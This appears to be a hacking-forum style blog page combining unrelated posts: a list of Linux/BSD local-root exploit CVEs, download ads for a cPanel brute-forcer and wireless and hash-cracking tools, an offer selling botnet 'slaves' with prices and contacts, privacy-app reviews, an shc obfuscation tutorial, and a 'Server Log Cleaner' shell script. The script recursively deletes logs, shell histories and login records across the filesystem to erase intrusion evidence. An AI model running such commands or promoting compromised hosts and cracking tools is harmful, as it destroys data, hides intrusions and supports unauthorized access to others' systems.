Linux/Bsd Localroot Exploits

Linux
2005
CVE-2005-1294
2006
N/A (2.6.13 < 2.6.17.4 - sys_prctl() Local Root Exploit)
N/A (< 2.6.17.4 - (proc) Local Root Exploit)
N/A (2.4.21)
N/A (2.6.9-42.0.3.ELsmp)
2007
N/A (2.6.9-55)
2008
CVE-2008-0010
CVE-2008-0009
CVE-2008-4210
2009
CVE-2009-2698
CVE-2009-3547
CVE-2009-1894
CVE-2009-2692
CVE-2009-0360
CVE-2009-1046
CVE-2009-1185
CVE-2009-1337
CVE-2009-1527
CVE-2009-2908
N/A (2.6.28)
N/A (2.6.29 ptrace_attach() Local Root Race Condition Exploit)
N/A (2.6 UDEV Local Privilege Escalation Exploit)
2010
CVE-2010-3850
CVE-2010-4347
CVE-2010-4073
CVE-2010-3848
CVE-2010-3904
CVE-2010-2959
CVE-2010-1146
CVE-2010-0832
CVE-2010-4170
CVE-2010-2961
CVE-2010-3301
CVE-2010-3856
CVE-2010-3847
CVE-2010-3081
CVE-2010-4077
CVE-2010-4258
CVE-2010-3849
CVE-2010-3850
N/A (2.6.18-194.1)
N/A (2.6.18-194.17.1.el5)
N/A (2.6.31)
N/A (2.6.32)
2011
CVE-2011-2777
CVE-2012-0809
CVE-2011-4124
CVE-2011-1485
N/A (CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit))
N/A (DEC Alpha Linux <= 3.0 local root exploit)
N/A (2.6.34)
N/A (2.6.33)
N/A (2.6.32-46)
N/A (< 2.6.28)
N/A (2.6.28)
N/A (2.6.18-274)
N/A (2.6.18-6-x86)
2012
CVE-2012-0056 (2.6.39 =>)
CVE-2012-3524
CVE-2012-0946
CVE-2012-0809
2013
CVE-2013-2094 (2.6.32 => 3.x.x)
CVE-2013-1763 (3.3.x => 3.7.x)
CVE-2013-1858 (3.8)
CVE-2013-2094 (<= 3.8.9)
2014
CVE-2014-0038 (3.4 =>)
BSD
2013
cve-2013-2171
2012
CVE-2012-0217
2011
CVE-2011-4122
CVE-2011-4862
CVE-2011-4062
CVE-2011-5054
2010
CVE-2010-4210
CVE-2010-2693
CVE-2010-2020
2009
CVE-2009-4146
N/A (< 7.2)
CVE-2009-3527
2008
CVE-2008-3531
CVE-2008-5736
CVE-2008-5736
2005
N/A (4.x , < 5.4)

Read More

Cpanel Bruter By Hack2Wwworld


Cpanel Bruter

You Just Need Good Usernme And Password List

FasT And Easy To Use

VIRUS SCAN LINK

DOWNLOAD LINK 1

DOWNLOAD LINK 2


Read More

SLAVES - BOTS - ZOMBIES

Hello World 

New Service For All :) Cheap and Good

We Sell Slaves Zombies Bots For Your Rats and Botnets

50 for $15 

100 for $20 

150 for $25

200 for $30

250 for $35

300 for $40

350 for $45

400 for $50

450 for $55

500 for $100

1000 for $150

Slaves All Over the World :-)

Money Method :- PerfectMoney - Bitcoin

Jabber :- j0er00t@exploit.im
ICQ :- 691768633
Skype :- joeroot.exploitinc
Read More
PQChat is a free private messaging app for iPhone (Android version coming soon), protecting data with the McEliece cryptosystem and  a propietary Never-The-Same encryption algorithm from SRD Wireless, a UK company.
The app stores minimal user information, everything is encrypted before leaving the device. The user’s phone number, nickname and ID-image are stored as one way hash values, the app masterpassword and a 5 digit alphanumeric PIN are set by the user, PQChat developers don’t know what they are or read your data, if you lose your masterpassword you will lock yourself out of your account for ever, there is no backdoor.
User authentication to establish a video call or send a text message to one of your contacts employs PQChat own Man At The End patented algorithm.
PQChat mobile phone encrypted chat
PQChat mobile phone encrypted chat
The user keeps total control over the messages he sends, first by encrypting them on the phone, secondly by being able to remotely delete the messages from the server or set a timer for automatic erasing. You are protected from wire-tapping with a single use encryption algorithm, akin to perfect forward privacy. Deleting the encrypted messages strengthens your security by stopping future attempts to break the cipher and it can help you when sending a message to the wrong contact.
This is a zero knowledge app being marketed as resistant to quantum computer cipher breaking, with PQChat standing for Post-Quantum Chat. The company claims that most standard encryption will be broken in the future with yet to be made Quantum computers.
The app includes a personal locker where to store encrypted passwords and bank details, it is doubtless a much better option than WhatsApp and other popular insecure messaging apps but you need to trust that the closed source encryption algorithm is safe and as usual in this kind of apps, the receiver and the sender both need to have the app installed to be able to communicate.
If it worries you that this is a UK company that could be forced to spy on you by blanket surveillance government order, PQChat developers acknowledge that will have to comply with authorities requests to monitor a user but since they are unable to decrypt messages there wouldn’t be much they can provide.
SITE LINK :- https://pq-chat.com/
Read More

The best XMPP/Jabber servers for anonymous chat

Jabber/XMPP is a decentralized P2P instant messenger using the open source XMPP protocol, there is no central server that could be compromised, the multiple nodes construct a resilient and hard to monitor infrastructure. Dozens of XMPP servers, encryption and its open source nature make XMPP much harder to wiretap or shut down than cloud based Google Hangouts, Yahoo Messenger or Skype, all USA companies known to have a NSA backdoor.
One of Jabber/XMPP main vulnerabilities is that the server you are connected to is not trustworthy, this is a list of XMPP servers with the best privacy policies:
Calyx Institute: A not for profit privacy and cyber-security foundation running a public Jabber/XMPP server that does not create any records of who you communicate with or keep logs of the content of any communications, this server forces you to use OTR, Off-the-Record Messaging, a cryptographic plugin that stops the server administrator from accessing plain text of your communications.
DuckGo: From the popular no tracking search engine with the same name, DuckDuckGo XMPP server can only communicate with other XMPP servers if they use encryption, if your contact is on an unencrypted server the connection will be rejected.  The server provides you with a free public XMPP server that will give you a Jabber @dukgo.com address. I was a little disappointed that DDG did not make their XMPP logging policy clear, I had to dig deep in their forums to find a very old thread saying that logging is kept to a minimum, I am not sure if this still applies.
OpenMailBox: A free privacy email provider that also comes with XMPP, to get the XMPP chat service you will have to register for an email account first. Openmailbox Jabber/XMPP connection is encrypted with Transport Layer Security (TLS), an asymmetric cryptographic protocol, all of this happens in the background with digital certificates, the user does not have to worry about anything. The downside of this provider is that they don’t enforce mandatory encryption in XMPP, you could be chatting in plain text if the other server does not support it.


PaleMoon: Public XMPP server from the PaleMoon project, a customized Firefox based browser focused on efficiency. Their XMPP chat server is disclosed as being in the European Union and establishing encrypted connections without any logging or auditing. To register for an account you need a Jabber client installed in your computer and follow the instructions on their page. There are no screenshots, if you don’t know how to configure a Jabber client it might not be the best choice for you.
JabberPPL: A long standing independent XMPP server that requires encryption is in place before it communicates with other servers, TLS and forward secrecy are supported. There is no information about who runs the server and what kind of logging they keep, other than “respects your privacy“, their domain name is protected with whois privacy and the website is hosted in Germany , on the positive side, they have been around for more than ten years and run a Diaspora server with an account where you can contact the administrator.
SwissJabber: The privacy policy of this provider states that communication contents are not logged, however, messages which could not be delivered immediately can be stored in the backup logs because it is not possible to remove them immediatly. Their server is located in Switzerland and governed by Swiss law, I am placing it here for those looking for an offshore XMPP server outside of the USA and the European Union. The service is run by a company called nine.ch. The page is only available in German but it can be dealt with using an online translator.
Neko IM: Running a public XMPP server located in Norway, they claim that no more information is collected and stored than what is absolutely necessary, TLS everywhere is enforced and Jabber clients need to support a strong cipher or they will not be able to connect to the network. Being a free volunteer run project, this server uptime comes accordingly to this and no guarantees are made about uptime other than “as much as possible“. - See more at: http://www.hacker10.com/computer-security/the-best-xmppjabber-servers-for-anonymous-chat/#sthash.B79hpjKm.dpuf
Countermail: This is a paid for service from a Sweden based email privacy company that provides the XMPP server xmpp.counternet.com with TLS and SSL encryption only available to email account holders. The username and password are randomly generated, you can not create your own, however, all XMPP clients supports “alias” or “display name” that you can manually set up and this is what other Jabber users will see.
About Jabber/XMPP security
Any IM client that supports the XMPP protocol can interact with other Jabber users, a few of the best know Jabber compatible clients are PidginThunderbird and Jitsi, they can be used for videocalls and sending files, but always remember that encryption and P2P  does not mean that your computer IP is hidden. Jabber will help you protect from wiretapping with encryption but the server you use could log what you do and your contact could find out your home IP if you are not on a proxy or VPN.
Another benefit of Jabber is that the same username and password can be used to connect with the social network Jappix, unlike Facebook, you don’t have to provide your real identity to take part in Jappix. And if you want to run your own Jabber/XMPP server that is another way to protect your online privacy, it is not hard to set up an XMPP server if you have basic understanding of Unix, search for Prosody or Tigase to find XMPP server software to run.
I included XMPP servers with a clear privacy policy of minimum logging or being offshore, those are the claims that the server administrators make, there is no way to verify any of them. If you are social activist RiseUp and Austici provide anonymous Jabber chat servers for people fighting for world change but they are not on the list because they are strictly for political activists.
Sometimes privacy minded individuals set up their own XMPP server and open them to everybody, due to the nature of one man operations, instead of including here privacy servers that have little backing and less chances of long term survival it is best that you check out an updated list of all public XMMP servers at https://xmpp.net/directory.php
Read More
Secret Sharp is a free Windows program based on the Shamir Secret Sharing scheme, a way to divide the decryption key to distribute it in between multiple participants. Data decryption is not possible without more than one share, if one of the keys were to be compromised it would be useless to decrypt anything on its own. The only way to unlock encrypted data in a Shamir Secret scheme is with multiple keys, named shares, in Secret Sharp you can set up a minimum of 2 shares and a maximum of 100 shares.
The software can only encrypt text messages and it needs .NET installed for it to work in Windows. After launching Secret Sharp a wizard will ask you whether you want to Combine Shares to decrypt a message or Share A Secret to encrypt data.
When you create a new secret you will be asked how many parts you would like to create and how many of the shares will be needed to reconstruct the secret. As it might not be always possible to get all of the participants shares, you can create a secret made up of, for example, 10 shares, with only 4 of those shares needed to decrypt the data. This allows for members of the group to be away on holiday, deceased, etc, and the others will still be able to access the secret with any of the 4 keys structuring the 10 shares secret.


The person that creates the secret gets to view all of the shares before distributing them to the participants, it is imperative that the secret creator has a secure computer with no trojan horse and can not be unsettled, there is nothing stopping that person from making a copy of the shares before distributing them instead of securely wiping the shares.
To rebuild an encrypted secret you will need to be in possession of the necessary shares and stipulate to Secret Sharp how many shares are needed to reconstruct it, the latter can be told to everybody in the group without endangering the secret and should be written down somewhere during share distribution.
Secret Sharp is the Windows version of ssss (Shamir Secret Sharing Scheme), a command line program for UNIX machines that does the same thing and there are also Java implementations around that will work on any machine, like Mac computers.
You could find a Shamir Secret encryption program like Secret Sharp useful to leave written instructions to be opened if you die, instructions to be opened if you are captured by the enemy or just to make sure what there are at least two people reading the message and trust is not placed on a single person alone.

Read More

Nwht - Network Wireless Hacking Tools


Network Wireless Hacking Tools, new version and support your kali linux.



DOWNLOAD LINK :- https://www.dropbox.com/s/kdn4znccu7t4v8r/NWHT.zip

Read More
Download shc and install it as shown below.
# wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgz
# tar xvfz shc-3.8.7.tgz
# cd shc-3.8.7
# make
Verify that shc is installed properly.
$ ./shc -v
shc parse(-f): No source file specified

shc Usage: shc [-e date] [-m addr] [-i iopt] [-x cmnd] [-l lopt] [-rvDTCAh] -f script

2. Create a Sample Shell Script

Create a sample bash shell script that you like to encrypt using shc for testing purpose.
For testing purpose, let us create the following random.sh shell script which generates random numbers. You have to specify how many random numbers you like to generate.
$ vi random.sh
#!/bin/bash

echo -n "How many random numbers do you want to generate? "
read max

for (( start = 1; start <= $max; start++ ))
do
  echo -e $RANDOM
done

$ ./random.sh
How many random numbers do you want to generate? 3
24682
1678
491

3. Encrypt the Shell Script Using shc

Encrypt the random.sh shell scripting using shc as shown below.
$ ./shc -f random.sh
This will create the following two files:
$ ls -l random.sh*
-rwxrw-r--. 1 ramesh ramesh   149 Mar 27 01:09 random.sh
-rwx-wx--x. 1 ramesh ramesh 11752 Mar 27 01:12 random.sh.x
-rw-rw-r--. 1 ramesh ramesh 10174 Mar 27 01:12 random.sh.x.c
  • random.sh is the original unencrypted shell script
  • random.sh.x is the encrypted shell script in binary format
  • random.sh.x.c is the C source code of the random.sh file. This C source code is compiled to create the above encrypted random.sh.x file. The whole logic behind the shc is to convert the random.sh shell script to random.sh.x.c C program (and of course compile that to generate the random.sh.x executable)
$ file random.sh
random.sh: Bourne-Again shell script text executable

$ file random.sh.x
random.sh.x: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, stripped

$ file random.sh.x.c
random.sh.x.c: ASCII C program text

4. Execute the Encrypted Shell Script

Now, let us execute the encrypted shell script to make sure it works as expected.
$ ./random.sh.x
How many random numbers do you want to generate? 3
7489
10494
29627
Please note that the binary itself is still dependent on the shell (the first line provided in the random.sh. i.e /bin/bash) to be available to execute the script.

5. Specifying Expiration Date for Your Shell Script

Using shc you can also specify an expiration date. i.e After this expiration date when somebody tries to execute the shell script, they'll get an error message.
Let us say that you don't want anybody to execute the random.sh.x after 31-Dec-2011 (I used last year date for testing purpose).
Create a new encrypted shell script using "shc -e" option to specify expiration date. The expiration date is specified in the dd/mm/yyyy format.
$ ./shc -e 31/12/2011 -f random.sh
In this example, if someone tries to execute the random.sh.x, after 31-Dec-2011, they'll get a default expiration message as shown below.
$ ./random.sh.x
./random.sh.x: has expired!
Please contact your provider
If you like to specify your own custom expiration message, use -m option (along with -e option as shown below).
$ ./shc -e 31/12/2011 -m "Contact admin@thegeekstuff.com for new version of this script" -f random.sh

$ ./random.sh.x
./random.sh.x: has expired!
Contact admin@thegeekstuff.com for new version of this script

6. Create Redistributable Encrypted Shell Scripts

Apart from -e, and -m (for expiration), you can also use the following options:
  • -r will relax security to create a redistributable binary that executes on other systems that runs the same operating system as the one on which it was compiled.
  • -T will allow the created binary files to be traceable using programs like strace, ltrace, etc.
  • -v is for verbose
Typically you might want to use both -r and -T option to craete a redistributable and tracable shell encrypted shell script as shown below.
$ ./shc -v -r -T -f random.sh
shc shll=bash
shc [-i]=-c
shc [-x]=exec '%s' "$@"
shc [-l]=
shc opts=
shc: cc  random.sh.x.c -o random.sh.x
shc: strip random.sh.x
shc: chmod go-r random.sh.x

$ ./random.sh.x
How many random numbers do you want to generate? 3
28954
1410
15234
Finally, it is worth repeating again: You should not be encrypting your shell script in the first place. But, if you decided to encrypt your shell script using shc, please remember that a smart person can still generate the original shell script from the encrypted binary that was created by shc.
Read More

Server Log Cleaner Linux

#!/bin/sh 
# Coded By Red H4t V!per (Vanda)
# chmod 0755 scriptname.sh >> ./scriptname.sh 

echo "[*] Going TO Delete Log Servers ... "
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout 
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp

echo "[*] Done . Good Luck;)"  
Read More

Decrypt3R-V3

what new on dEcrypt3r V.3 ?? more than 18 features inside this toolsa

kali.png?w=646

This is my dEcrypt3r V.3 interface

Screenshot-01152014-090424AM_zps318d3719

Menu 1 > Crypt0
Screenshot-01152014-090442AM_zps577d7221

Menu 2 > h4sh-Cr4ck

Screenshot-01152014-090458AM_zps6147dbcd

Menu 3 > H4sh63n3R470R

Screenshot-01152014-090511AM_zpsead3fc6d

Menu 4 > 3nc0din6

Screenshot-01152014-090521AM_zps604ba9b0

Menu 5 > Hash Identifier

Screenshot-01152014-090533AM_zps47918f86

Read More